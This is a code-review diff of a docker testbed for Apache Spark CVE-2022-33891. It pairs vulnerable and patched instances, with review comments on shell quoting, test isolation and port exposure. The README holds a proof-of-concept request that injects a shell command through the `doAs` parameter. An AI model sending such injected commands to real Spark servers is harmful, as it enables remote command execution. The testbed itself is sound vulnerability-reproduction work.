36 changes: 29 additions & 7 deletions apache/spark/CVE-2022-33891/README.md
Original file line number Diff line number Diff line change
@@ -1,11 +1,33 @@
Apache Spark CVE-2022-33891
# Apache Spark CVE-2022-33891

This directory contains the deployment config for Apache Spark. Versions earlier than 3.2.2 or 3.3.0 are vulnerable to this vulnerability.
This directory contains a docker compose file for Apache Spark which runs both safe and vulnerable versions. Versions earlier than 3.2.2 or 3.3.0 are vulnerable to this vulnerability.

The deployed service listens on port `8080`.
## Docker Compose
```
docker compose up
```
The vulnerable Spark instance will be at http://localhost:8081/ and the non-vulnerable Spark instance will be at http://localhost:8082/

## Vulnerable version
docker-compose -f vuln-docker-compose.yml up -d
### Vulnerable case
```
curl http://localhost:8081/?doAs=`touch%20/tmp/tmpfile`
```
Response:
```
...
<title>Error 403 User `touch /tmp/tmpfile` is not authorized to access this page.</title>
...
```
If you run `ls /tmp` from inside the container, `tmpfile` will be present.

## Fixed version
docker-compose -f fixed-docker-compose.yml up -d
### Safe case
```
curl http://localhost:8082/?doAs=`touch%20/tmp/tmpfile`
```
Response:
```
...
<title>Spark Master at spark://2997522835aa:7077</title>
...
```
The `tmpfile` will not be in `/tmp`.
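Review bot: In both `curl` blocks the URL is unquoted, so in a POSIX shell the backticks around `touch%20/tmp/tmpfile` are evaluated as command substitution on the tester's own machine before curl runs, and the `doAs` value that reaches Spark is not the one shown in the sample 403 response. Wrap the URL in single quotes in the vulnerable and the safe case. The verification step "run `ls /tmp` from inside the container" would also be easier to reproduce with the exact command and service name, for example `docker compose exec spark-vuln ls /tmp`, and the README should say that the vulnerable instance is started with `spark.acls.enable true`, since that setting appears only in the compose file.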
Original file line number Diff line number Diff line change
@@ -1,8 +1,18 @@
version: '2'

services:
spark:
image: docker.io/bitnami/spark:3.1.1
spark-safe:
image: docker.io/bitnamilegacy/spark:3.2.4
environment:
- SPARK_MODE=master
- SPARK_RPC_AUTHENTICATION_ENABLED=no
- SPARK_RPC_ENCRYPTION_ENABLED=no
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8082:8080'
spark-vuln:
image: docker.io/bitnamilegacy/spark:3.1.1
entrypoint: ["/bin/bash", "-c", "echo \"spark.acls.enable true\" >> /opt/bitnami/spark/conf/spark-defaults.conf && /opt/bitnami/scripts/spark/entrypoint.sh && /opt/bitnami/scripts/spark/run.sh"]
environment:
- SPARK_MODE=master
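Review bot: `spark-safe` and `spark-vuln` differ in two ways, not one: the image tag (3.2.4 against 3.1.1) and the `entrypoint` override that appends `spark.acls.enable true` to `spark-defaults.conf`, which is set only on `spark-vuln`. With ACLs left at their default on `spark-safe`, the "Safe case" response in the README cannot be attributed to the version alone. Apply the same `entrypoint` line to `spark-safe` so that both instances run with ACLs enabled and the only variable is the Spark version. A short YAML comment above the `entrypoint` explaining why the setting is appended would help the next reader.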
Expand All @@ -11,4 +21,4 @@ services:
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8080:8080'
- '8081:8080'
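Review bot: The mapping `'8081:8080'` publishes the deliberately vulnerable master UI on every host interface, while the same service runs with `SPARK_RPC_AUTHENTICATION_ENABLED=no` and `SPARK_SSL_ENABLED=no`. Since the README only ever addresses the instances through `localhost`, bind the port to loopback, for example `'127.0.0.1:8081:8080'`, and do the same for the `'8082:8080'` mapping on `spark-safe`, so the testbed is not reachable from other machines on the network.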
13 changes: 0 additions & 13 deletions apache/spark/CVE-2022-33891/fixed-docker-compose.yml

This file was deleted.